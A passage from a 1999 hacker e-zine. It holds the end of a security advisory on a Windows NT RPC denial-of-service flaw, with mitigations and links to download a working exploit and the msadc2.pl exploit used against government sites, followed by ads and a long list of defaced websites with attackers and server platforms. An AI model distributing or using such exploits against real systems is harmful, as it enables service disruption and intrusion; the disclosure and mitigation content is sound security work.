      it is found.  If you come across a situation where a box is impervious to
      the exploit, PLEASE EMAIL ME.  I would really appreciate the entire
      install history of that particular system.  Email to rfp@wiretrip.net.
      
      
      ----[ 2. Solution
      
              Well, as previously stated, Luke and ISS informed Microsoft of the
      LSA vulnerability in February 1999.  To be fair, I also reported this
      exact bug, along with the working exploit, to Microsoft on Oct 25th.  Have
      not heard a word.  So, in the meantime, I can recommend two things:
      
      - Block port 139 on your firewall.  This, however, does not stop internal
      attack.
      
      - Turn off the Server service.  While inconvenient, this should be deemed
      as a temporary solution until Microsoft releases a patch.  Just for
      reference, shutting off the Server service will also shut down the
      Computer Browser service.  Glitch, a fellow Wiretrip member, describes the
      functions of these services as follows:
      
      SERVER: Used as the key to all server-side NetBIOS applications, this
      service is somewhat needed. Without this service, some of the
      administrative tools, such as Server Manager, could not be used. If remote
      administration is not needed, I highly recommend disabling this service.
      Contrary to popular belief, this service is NOT needed on a webserver.
      
      COMPUTER BROWSER: The Computer Browser service is a function within
      Microsoft networking for gathering and distributing resource information.
      When active on a server, the server will register its name through a
      NetBIOS broadcast or directly to a WINS server. 
      
      So you should note that turning these services off will disable the server
      from participating in NetBIOS-related functions, including file sharing
      and remote management.  But realistically, how many servers need this?
      Alternate means of content publishing (for webservers) exist (FTP and
      -ugh- FrontPage).  Of course this leaves the myriad of other services
      though.  I'd be interested to see how MS SQL fares.
      
      It's hoped that between the services.exe and the lsass.exe denial of
      services, both based on bad RPC code, Microsoft will find this problem
      worthy of fixing.
      
      Now we wait...
      
      
      ----[ 3. Where to Get This Weapon of Mass Destruction
      
              I use this title jokingly.  But trust me, I have gone back and
      forth about the release of this exploit.  However, as a proponent of full
      disclosure, I definitely will release a working exploit.  But I do so with
      conditions:
      
      - I will only release a Windows executable.
      
      - The windows executable is coded to reboot (NT) or crash (9x) upon
      successful execution.  If you blow something up, you blow up too.
      
      - A few checks that keep the program from running if you run in a user
      context that does not allow the above 'safety features' to work.
      
      But it is a working executable.  I'm hoping this will at least curb the
      script kiddie activity.  Of course, I'm sure this program will be reversed
      and a new version made within 6 hours of posting--but that's not my
      problem.  This should be more than enough to verify/test the exploit, and
      I've provided the details of how it works and the solutions necessary for
      stopping it.  The skilled will be able to go off this, and the, well, the
      abusers will hit the glass ceiling as intended.  Thanks to Vacuum for
      helping me come up with a responsible solution.
      
      Also, I want to make it very clear, before I tell you where to get the
      executable....
      
                             DO NOT ASK ME FOR SOURCE.
                             DO NOT ASK ME FOR SOURCE.
                             DO NOT ASK ME FOR SOURCE.
                             DO NOT ASK ME FOR SOURCE.
                             DO NOT ASK ME FOR SOURCE.
                             DO NOT ASK ME FOR SOURCE.
                             DO NOT ASK ME FOR SOURCE.
      
      oh, and
      
                             DO NOT ASK ME FOR SOURCE.
      
      
      I don't care who you are.  All email asking for source will be instantly
      deleted.  I don't care if you send me the secret to life--if it has "p.s.
      can I get the source?" I will pipe that thing to /dev/null, along with
      whatever goodies you may have sent me.  Don't even joke; you won't get a
      reply.
      
              Now that that's established, you can download RFPoison.exe from my
      website (of course) at http://www.wiretrip.net/rfp/
      
      
      
      ----[ 4. Miscellaneous Updates (Important stuff!)
      
      
      - whisker 1.2.0 has been released!  Includes the ability to bounce scans
      off of AltaVista (thanks to Philip Stoev) Plus some new feature additions,
      and new scan scripts, including a comprehensive script for scanning
      FrontPage (thanks to Sozni).
      
      - flipz and fuqrag have been busy hacking .gov and .mil sites.  Turns out
      they're using a vanilla copy of msadc2.pl.  Check out msadc2.pl (their
      exploit) at my website.
      
      - Zeus Technologies had an outstanding response to RFP9905.  In under 12
      hours they had a patched version available, and were all-around terrific in
      their private and public response.  As an indication of how they do
      business, I would recommend Zeus Technologies as a vendor to anyone.  Kudos
      for them.
      
      - technotronic and rfp.labs have teamed up!  We're going to combine a couple
      of resources--starting with the mailing list.  Technotronic already puts out
      some good info on his list...now I'll be giving the same list up to date
      information on rfp.labs advisories, information, and other various cool
      info.  If you're not on it already, you may consider joining.  Signup at
      www.technotronic.com
      
      - with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take
      over with 'w00giving'--all through the month of November w00w00 will be
      releasing some more stuff!  You can start looking for the first (of many)
      advisories today (Nov 1st).
      
      Special greetings to Simple Nomad (and others) on this special day where
      the wheel finishes its cycle and starts its revolution anew.
      
      
      
      --- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip ---
      
                 So what if I'm not elite.  My mom says I'm special.
      
      --- Advisory RFP9906 ----------------------------- rfp.labs -----------
      
      
      @HWA
      
       
       
       
      
    

      

      

      
                                                                 
      -=----------=-         -=----------=-        -=----------=-       -=----------=- 
                                           
                                             0                                     
                                             0                                     
                                             0
                                             o
                                           O O O   
                                             0
                                                                     
                                                                                  
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
         



     
     
     
     
     
AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/

      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
 
       When people ask you "Who is Kevin Mitnick?" do you have an answer? 
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!             #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       http://www.2600.com/  http://www.kevinmitnick.com
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *  http://www.csoft.net" One of our sponsors, visit them now  www.csoft.net   * 
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //     or cruciphux@dok.org                                                 //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! ............c'mon, you KNOW you
      wanna...yeah you do...make it fresh and new...be famous...<sic> 
      
      
      
       
       
 SITE.1 
      
      Sometimes we have zip sometimes we have lots....here's some sites to check out
      
      
      http://www.yaromat.com/macos8/index.htm
      
      Cool site, not security related but has a neat effect, 'converts your windows
      9x box to MacOS8' - use Netscape for best results. - Duro


      http://www.hack.co.za
      
      Recently updated with new sections, check it out.
      
      http://www.sentinel.dircon.co.uk/
      
      Good H/P/A site with lots of older texts and a good layout. Check it out...
      
      http://www.pfuca.com/products/hhkb/
      
      The 'hackers' keyboard, this keyboard is a small footprint, multi-os compatible
      keyboard, check it out... - Ed
      
      
      http://www.piratecity.com/rules.htm
      
      Free underground website hosting, 20MB free, soon to have email ala hotmail
      too. Check this site out if you want to run a site and are sick of the
      usual free provider restrictions.
      
      Rules:
      
      Our Simple Terms and Conditions 
      NO WAREZ (pirate software) CAN BE ACTUALLY STORED ON OUR SERVERS but you can have
               links to warez stored elsewhere.  This is because of bandwidth concerns.
      NO ADULT MATERIAL WHATSOEVER WILL BE TOLERATED. Please find a FREE adult website
               provider for such material there are many out there.
      NO SPAMMING!  If you spam we will terminate your account immediately and notify 
               your ISP.
      NO manipulation of our advertising banner or link and .  This pays for your free 
               webspace and the work that goes into Piratecity.com
      NO using your site as a storage site for another site or passwording your site.
      NO normal mundane sites, go to Fortunecity.com  for that kind of stuff!

      That's it.
      
      -=-s

      
      http://www.nethersearch.com/
      
      Underground search portal with a lot of local content too, well worth checking
      out. HWA is also mirrored there, and a lot of decent tutorials and the like can
      be found within this site. Check her out.
      
       
      http://www.bigbrotherinside.com/
      
      Privacy advocates speak out about the branding of all PIII chips with a software
      recoverable id code embedded in all PIII chips, sure you can turn it off with
      software but be warned it can also be turned on again remotely without your
      knowledge, check this site out for more details. (See section 30.0 too)
      
      - Repluzer 
       
 
      http://www.bugnet.com/
      
      First off, it's pay, which sucks. Secondly this site is a teaser with some 'free'
      bug alerts, and hacks, synopsis: subscribe to BUGTRAQ and visit Security Focus
      instead. - sAs-
 
 
      http://www.ussrback.com/
      
      Security services website, offers many homegrown advisories and current
      exploits. Nasty background is kinda hard on the eyes but otherwise a nice
      layout and full of good info, watch for lots of stuff from this site in
      here. - Ed
 
 
            
      You can Send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as the
      channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      * Info supplied by the attrition.org mailing list.
      
      Defaced domain: www.koko.gov.my 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.koko.gov.my 
      Defaced by: nugz 
      Operating System: Windows NT (IIS/4.0)
 
 
      Defaced domain: www.clubber.co.uk 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clubber.co.uk 
      Defaced by: ContrOl-C 
      Operating System: BSDI 4.0 (Apache 1.3.1.1)
       
       
      Defaced domain: www.pure-elite.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.pure-elite.com 
      Defaced by: Sabu 
      Operating System: Solaris 2.6 - 2.7 (Apache 1.3.6)
       
       
      Defaced domain: www.intelcities.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.intelcities.com 
      Defaced by: HiP 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.altavista.software.digital.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.altavista.software.digital.com 
      Defaced by: ytcracker 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.acerperipherals.co 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.acerperipherals.com 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: secure.wavetech.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/secure.wavetech.com 
      Defaced by: Uneek Tech 
      Operating System: Windows NT
      
      Defaced domain: shadow.fnn.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net 
      Defaced by: fl13s cr3w 
      Operating System: Linux (Apache 1.1.3)
       
       
      Defaced domain: www.record.org 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.record.org 
      Defaced by: w0lf 
      Operating System: Irix (Rapidsite/Apa-1.3.4)
       
       
      Defaced domain: www.waterworld.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.waterworld.com 
      Defaced by: globher 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.chicks.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.chicks.net 
      Defaced by: h4p
      Operating System: Linux (Red Hat) (Apache 1.3.9)
       
       
      Defaced domain: sac.prodam.sp.gov.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/sac.prodam.sp.gov.br 
      Defaced by: globher 
      Operating System: Windows NT(IIS/4.0)
       
       
      Defaced domain: www.lickass.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.lickass.net 
      Defaced by: cowhead2000 
      Operating System: Linux
        
      Defaced domain: www.fesp.rj.gov.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.fesp.rj.gov.br 
      Defaced by: globher 
      Operating System: Windows NT 
       
      Defaced domain: www.sample.burst.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.sample.burst.n 
      Defaced by: bansh33 
      Operating System: Linux (Apache 1.3.9, PHP/mod_frontpage/mod_ssl) 
       
      Defaced domain: www.igrejauniversal.com.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.igrejauniversal.com.br 
      Operating System: Linux (Apache 1.2.4)
       
       
      Defaced domain: fanta.me.uiuc.edu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/fanta.me.uiuc.edu 
      Defaced by: tonekore 
      Operating System: Linux (Red Hat) (Apache 1.3.6)
       
       
      Defaced domain: shadow.fnn.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net 
      Operating System: Linux (Apache 1.1.3)
       
       
      Defaced domain: 198.116.6.52 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/198.116.6.52 
      Defaced by: dap 
      Operating System: RedHat Linux (Apache 1.3.6)
       
       
      Defaced domain: www.guardtech.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.guardtech.com 
      Defaced by: ytcracker
      Operating System: Windows NT (IIS/4.0)

      Defaced domain: helpchat.worldnet.att.net
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/helpchat.worldnet.att 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: www.statssa.gov.za 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.statssa.gov.za 
      Defaced by: globher 
      Operating System: Windows NT
        
      Defaced domain: www.mcdonalds.com.au 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.mcdonalds.com.au 
      Defaced by: dukj 
      Operating System: Windows NT 
       
      Defaced domain: www.fsiferreira.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.fsiferreira.com 
      Defaced by: dap 
      Operating System: Linux 
       
      Defaced domain: www.gcpr.org 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.gcpr.org 
      Defaced by: rackmount 
      Operating System: Windows NT 
       
      Defaced domain: ntwww.ansys.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/ntwww.ansys.com 
      Defaced by: rackmount 
      Operating System: Windows NT 
       
      Defaced domain: www.ofcm.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.ofcm.gov 
      Defaced by: rackmount 
      Operating System: Windows NT
      
      
      Defaced domain: www.aiwa.com  
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.aiwa.com   
      Defaced by: rackmount       
      Operating System: Windows NT      
      
      Defaced domain: www.willieesco.com        
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.willieesco.com          
      Defaced by: h4x0ring f0r swedish grlz
      Operating System: Linux      
      
      Defaced domain: beta.millicent.digital.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/beta.millicent.digital.com 
      Defaced by: ytcracker                    
      Operating System: Windows NT (IIS/4.0)                   
      
      Defaced domain: www.wings.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.wings.com 
      Defaced by: sSh 
      Operating System: Windows NT
       
       
      Defaced domain: www.apptech-cc.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.apptech-cc.com 
      Defaced by: Digital Domination 
      Operating System: Digital Unix
       
       
      
      Defaced domain: www.crystaltips.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.crystaltips.com 
      Defaced by: bansh33 
      Operating System: Linux
      
      Defaced domain: www.melissa.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.melissa.com 
      Defaced by: p4riah 
      Operating System: Solaris (Apache 1.3.3)
       
      
      Defaced domain: boubakar.cit.nih.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/boubakar.cit.nih.gov 
      Defaced by: max 
      Operating System: Linux
      
      
      Defaced domain: www-curator.jsc.nasa.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www-curator.jsc.nasa.gov 
      Defaced by: ytcracker 
      Operating System: Windows NT
       
       
      Defaced domain: www.cyoc.org 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cyoc.org 
      Defaced by: weLLfare 
      Operating System: Solaris
       
      
      Defaced domain: aabea.org 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/aabea.org 
      Defaced by: BreAc0n 
      Operating System: Red Hat Linux 
       
      
      Defaced domain: www.mute300.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mute300.net 
      Defaced by: Sabu 
      Operating System: FreeBSD
       
      
      Defaced domain: www.tcs.com.sg
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.tcs.com.sg
      Defaced by: Sarin 
      Operating System: Windows NT
       
      
      Defaced domain: www.dare.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.dare.com 
      Defaced by: Coolio 
      Operating System: Irix
      
      Defaced domain: n1-3-6.irt.drexel.edu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/n1-3-6.irt.drexel.edu 
      Defaced by: sSh 
      Operating System: Windows NT
      
      Defaced domain: www.babybook.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.babybook.net 
      Defaced by: globher 
      Operating System: Windows NT 
       
      
      Defaced domain: www.hershey.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.hershey.com 
      Defaced by: Sesame Street Hackers (sSh) 
      Operating System: Windows NT 
       
      
      Defaced domain: www.mcdonalds.com.au 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mcdonalds.com.au 
      Defaced by: globher 
      Operating System: Windows NT 
       
      
      Defaced domain: www.webspawn.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.webspawn.com  
      Operating System: BSDI
      
      Defaced domain: redskin.dap.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/redskin.dap.ch 
      Defaced by: Sesame Street Hax0rz 
      Operating System: Red Hat Linux
      
       
      Defaced domain: www.cvm.tamu.edu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cvm.tamu.edu 
      Defaced by: sSh 
      Operating System: Windows NT
       
       
      Defaced domain: www.aceralliance.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.aceralliance.com 
      Defaced by: Sesame Street Hax0rz 
      Operating System: Windows NT
       
       
      Defaced domain: www.phe.queensu.ca 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.phe.queensu.ca
      Operating System: Linux
       
       
      Defaced domain: www.phoenixcomms.com.sg 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.phoenixcomms.com.sg 
      Defaced by: un33k t3ch 
      Operating System: Windows NT (IIS/3.0) 
       
      Defaced domain: www.chicks.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.chicks.net 
      Defaced by: unknown 
      Operating System: Linux (Red Hat) (Apache 1.3.9)
       
       
      Defaced domain: www.dcrt.nih.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.dcrt.nih.gov
      Defaced by: h2Vk 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.aar.tc.faa.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.aar.tc.faa.gov 
      Defaced by: sSh 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.ohio.doe.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ohio.doe.gov 
      Defaced by: hV2k 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.gc.doe.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov 
      Defaced by: h2Vk 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.gc.doe.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.gc.doe.gov 
      Defaced by: globher 
      Operating System: Windows NT 
       
      Defaced domain: www.igrejauniversal.com.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.igrejauniversal.com.br 
      Defaced by: Maverick 
      Operating System: Linux 
       
      Defaced domain: abacus.mc.duke.edu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/abacus.mc.duke.edu 
      Defaced by: Verb0 
      Operating System: Windows NT 
       
      Defaced domain: www.oarhq.noaa.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.oarhq.noaa.gov 
      Defaced by: Sesame Street Hax0rz 
      Operating System: Windows NT 
       
      Defaced domain: www.monica-lewinsky.org (yeah yet again) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.monica-lewinsky.org 
      Defaced by: ne0h 
      Operating System: BSDI
      
      
      Defaced domain: www.theblue.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.theblue.net 
      Defaced by: knell 
      Operating System: Linux 
       
      Defaced domain: www.fesp.rj.gov.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.fesp.rj.gov.br 
      Defaced by: p4riah 
      Operating System: Windows NT
       
       
      Defaced domain: www.waterworld.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.waterworld.com 
      Defaced by: p4riah 
      Operating System: Windows NT
       
       
      Defaced domain: seb.ce.gatech.edu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/seb.ce.gatech.edu 
      Defaced by: spinkus 
      Operating System: Solaris
       
      Defaced domain: assinet.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/assinet.com 
      Defaced by: twd 
      Operating System: Windows NT 
       
      
      Defaced domain: www.svic.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.svic.net 
      Defaced by: twd 
      Operating System: Windows NT 
       
      Defaced domain: stinkdog.bidmc.harvard.edu 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/stinkdog.bidmc.harvard.edu 
      Operating System: Red Hat Linux
       
       
      Defaced domain: www.congruentsoft.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.congruentsoft.com 
      Defaced by: twd 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: netcommerce.com.sg 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/netcommerce.com.sg 
      Defaced by: twd 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.spykee.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.spykee.com  
      Operating System: OpenBSD 2.4 (Apache 1.3.9)
       
       
      Defaced domain: www.ssp.df.gov.br 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/18/www.ssp.df.gov.br 
      Defaced by: JLM 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.firebat.net 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.firebat.net 
      Defaced by: Sabu and Six 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.muis.gov.sg 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.muis.gov.sg 
      Defaced by: Sarin 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: registry.faa.gov 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/registry.faa.gov 
      Defaced by: sSh
      Operating System: Windows NT (IIS/4.0)

      Defaced domain: atsy2k.faa.gov
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/atsy2k.faa.gov 
      Defaced by: sSh 
      Operating System: Windows NT (IIS/4.0) 
       
      Defaced domain: www.teamdawghouse.com 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.teamdawghouse.com 
      Defaced by: Sabu 
      Operating System: Linux (Apache 1.3.4) 
      
      
      Defaced domain: www.learncomm.org
      Site Title: Kiel Woodward Associates
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.learncomm.org
      Defaced by: ieet
      Operating System: Irix (Rapidsite/Apa-1.3.4)
       
       
      Defaced domain: www.ssp.df.gov.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.ssp.df.gov.br 
      Defaced by: Fuby 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.facsfinancial.com
      Site Title: Facs Financial 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.facsfinancial.com
      Defaced by: sSh 
      Operating System: Windows NT (IIS/4.0)
      
      
      Defaced domain: www.whiterules.com
      Site Title: White Rules 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.whiterules.com 
      Defaced by: TWHA 
      Operating System: Linux (Apache 1.3.3)
      
      
      Defaced domain: www.hawgparts.com
      Site Title: P and S Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.hawgparts.com 
      Defaced by: Devil-C 
      Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
      There are hidden comments in the HTML.
       
       
      Defaced domain: www.sect.mg.gov.br
      Site Title: Secretaria de Estado de Ciência e Tecnologia de Minas Gerais
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.sect.mg.gov.br 
      Defaced by: globher 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.senado-ba.gov.ar 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.senado-ba.gov.ar
      Defaced by: c0rvus 
      Operating System: Windows NT (IIS/4.0) 
      
      
      Defaced domain: www.citizens-bank-nm.com
      Site Title: Citizens Bank 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.citizens-bank-nm.com 
      Operating System: Windows NT (IIS/4.0)
      
      
      Defaced domain: www.moscow-bank.ru
      Site Title: Moscow Bank 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.moscow-bank.ru 
      Defaced by: dukj 
      Operating System: Windows NT (IIS/4.0)
       
       
      Defaced domain: www.pobis.net
      Site Title: ASIA INFORMATION NETWORK 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/www.pobis.net 
      Defaced by: Darkness 
      Operating System: Linux (Apache 1.1.1) 
       
      Defaced domain: wayland.k12.mi.us
      Site Title: Wayland K12 School (MI) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/19/wayland.k12.mi.us 
      Defaced by: Darkness 
      Operating System: Red Hat Linux (Apache 1.3.6)
       
       
      Defaced domain: www.caloritec.ch 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.caloritec.ch 
      Defaced by: xhostile & acidklown 
      Operating System: Windows NT (Elogia Web Server/1.0)
       
       
      Defaced domain: www.markowitzmail.com
      Site Title: Markowitz Mall 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.markowitzmail.com 
      Defaced by: sSh 
      Operating System: Red Hat Linux (Apache 1.3.6)
       
       
      Defaced domain: www.pathword.com
      Site Title: Roger Solioz (PATHWORD-DOM) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/20/www.pathword.com 
